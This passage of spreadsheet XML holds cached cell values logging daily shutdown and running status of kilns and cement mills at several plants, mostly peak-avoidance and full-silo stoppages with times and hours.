            <v>窑:正常。A组磨：14:05-24:00避峰停机。D1#磨：8:00-9:00避峰停机;14:50-24:00避峰停机，D1#磨：8:00-9:00避峰停机;14:50-24:00避峰停机，</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:9:45-24:00避峰停机。2#磨:0:00-24:00库满停机。3#磨:13:30-22:20库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨正常运行。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:40避峰停机；2#磨：8:30-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：7:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:20-24:00避峰停机。D1#磨：8:30-24:00避峰停机，D2#磨：8:30-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:7:00-24:00库满停机。2#磨:正常。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:20避峰停机；2#磨：10:00-22:10避峰停机；3#磨：9:00-24:00大修停机；4#磨：0:00-22:10续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:50-17:10避峰停机。D1#磨：16:00-24:00避峰停机，D2#磨：16:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:9:30-22:15避峰停机。2#磨:9:45-22:00避峰停机。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨16:30-23:30避峰停机:7小时(避峰)。2#磨16:30-22:15避峰停机:6.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：9:20-22:10避峰停机；3#磨：大修续停；4#磨：9:20-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:00-18:05避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:10:00-22:20避峰停机。2#磨:15:00-24:00库满停机。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:14:58-24:00错峰停窑。2#窑:续停。水泥磨:1#磨：8:00-22:40避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：10:00-22:30避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：正常。D1#磨：8:00-16:50避峰停机，D2#磨：8:00-16:50避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:55避峰停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：8:00-22:20避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：正常。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:20库满停机。2#磨:6:00-22:30避峰停机。3#磨:6:00-22:20避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨10:00-22:15避峰停机:12.25小时(避峰)。2#磨11:00-22:00避峰停机:11小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：9:30-22:10避峰停机；3#磨：大修续停；4#磨：15:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：9:30-24:00避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-24:00库满停机。2#磨:8:00-22:05避峰停机。3#磨:8:00-23:20避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨8:45-22:15避峰停机:13.5小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：8:00-22:40避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：16:55-24:00避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:9:45-22:15避峰停机。2#磨:8:00-22:25避峰停机。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:20避峰停机；3#磨：0:00-22:20大修续停；4#磨：10:00-22:20避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：9:15-24:00避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:21:00点火升温；1#磨:9:45-22:20避峰停机。2#磨:8:00-22:10避峰停机。3#磨:8:00-22:55避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:40避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:20避峰停机；4#磨：10:00-22:20避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:40-24:00避峰停机。D1#磨：15:00-24:00避峰停机，D2#磨：15:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:10:58窑投料，13:51-24:00抢修窑尾托轮轴瓦高温（机械）；1#磨:4:35-24:00库满停机。2#磨:4:35-24:00库满停机。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-24:00避峰停机:16小时(避峰)。2#磨14:30-23:15避峰停机:8.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-24:00避峰停机；3#磨：10:00-22:10避峰停机；4#磨：8:30-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:55-24:00避峰停机。D1#磨：12:25-24:00避峰停机，D2#磨：12:25-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:0:00-17:55库满停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-22:10避峰停机；2#磨：8:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：12:55-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:正常。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-22:10避峰停机；2#磨：8:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：0:00-22:10续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：正常。D1#磨：8:00-16:00避峰停机，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-24:00避峰停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-23:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：8:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:25-24:00避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:20:28点火；1#磨:0:00-24:00库满停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:00-23:15避峰停机:9.25小时(避峰)。2#磨13:30-24:00避峰停机:10.5小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:20避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:20避峰停机；4#磨：10:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:20:58-24:00错峰停机。A组磨：13:00-24:00避峰停机。D1#磨：11:15-24:00避峰停机，D2#磨：11:15-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:8:58窑投料；1#磨:0:00-21:45库满停机。2#磨:0:00-19:55库满停机。3#磨:0:00-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：9:40-22:10避峰停机；4#磨：10:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:40-24:00避峰停机。D1#磨：8:50-24:00避峰停机，D2#磨：8:50-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:正常。2#磨:8:45-24:00避峰停机。3#磨:0:00-22:30库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-22:10避峰停机:7.67小时(避峰)。2#磨运行正常。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:8:00-24:00避峰停机。2#磨:正常。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-24:00避峰停机:16小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：9:45-22:10避峰停机；3#磨：9:35-22:10避峰停机；4#磨：9:35-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-18:00避峰停机，D2#磨：8:00-18:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:0:00-0:15,10:00-24:00避峰停机。2#磨:10:00-24:00避峰停机。3#磨:14:50-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨0:00-6:00供电所检修停电停机:6小时(其它)。2#磨0:00-7:30供电所检修停电停机:7.5小时(其它)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：续停；2#磨：8:30-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:熟料质量波动减产；1#磨:0:00-24:00库满停机。2#磨:0:00-24:00库满停机。3#磨:20:55-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨运行正常。2#磨运行正常。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：续停；2#磨：8:00-24:00避峰停机；3#磨：8:00-22:10避峰停机；4#磨：8:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:00-24:00焊辊面定检停机。D1#磨：正常，D2#磨：8:30-10:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:熟料质量波动减产；1#磨:0:00-21:55库满停机。2#磨:0:00-19:00库满停机。3#磨:0:00-15:40，22:10-24:00库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.75小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：0:00-22:10续停；2#磨：续停；3#磨：8:00-23:00避峰停机；4#磨：8:00-22:20避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：0:00-24:00续停。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-22：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:正常；1#磨:正常。2#磨:正常。3#磨:0:00-16:25库满停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨运行正常。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="27">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：0:00-22:10续停；3#磨：8:00-22:20避峰停机；4#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：0:00-12:30续停。D1#磨：正常，D2#磨：正常。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:正常；1#磨:8:00-24:00避峰停机。2#磨:正常。3#磨:8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨运行正常。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：9:05-22:10避峰停机；3#磨：10:00-22:20避峰停机；4#磨：0:00-22:10续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：11:30-24:00避峰停机。D1#磨：10:20-24:00避峰停机，D2#磨：10:20-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:正常；1#磨:正常。2#磨:8:00-22:45避峰停机。3#磨:8:00-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨运行正常。2#磨运行正常。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：0:00-22:50续停；2#磨：正常；3#磨：8:00-24:00避峰停机；4#磨：10:00-23:20避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:20-24:00避峰停机。D1#磨：9:10-22:00避峰停机，D2#磨：9:10-22:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:20避峰停机。2#磨:4:30-24:00库满停机。3#磨:8:30-22:25避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨运行正常。2#磨8:00-21:30避峰停机:13.5小时(避峰)。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：11:20-24:00避峰停机；3#磨：8:00-24:00避峰停机；4#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
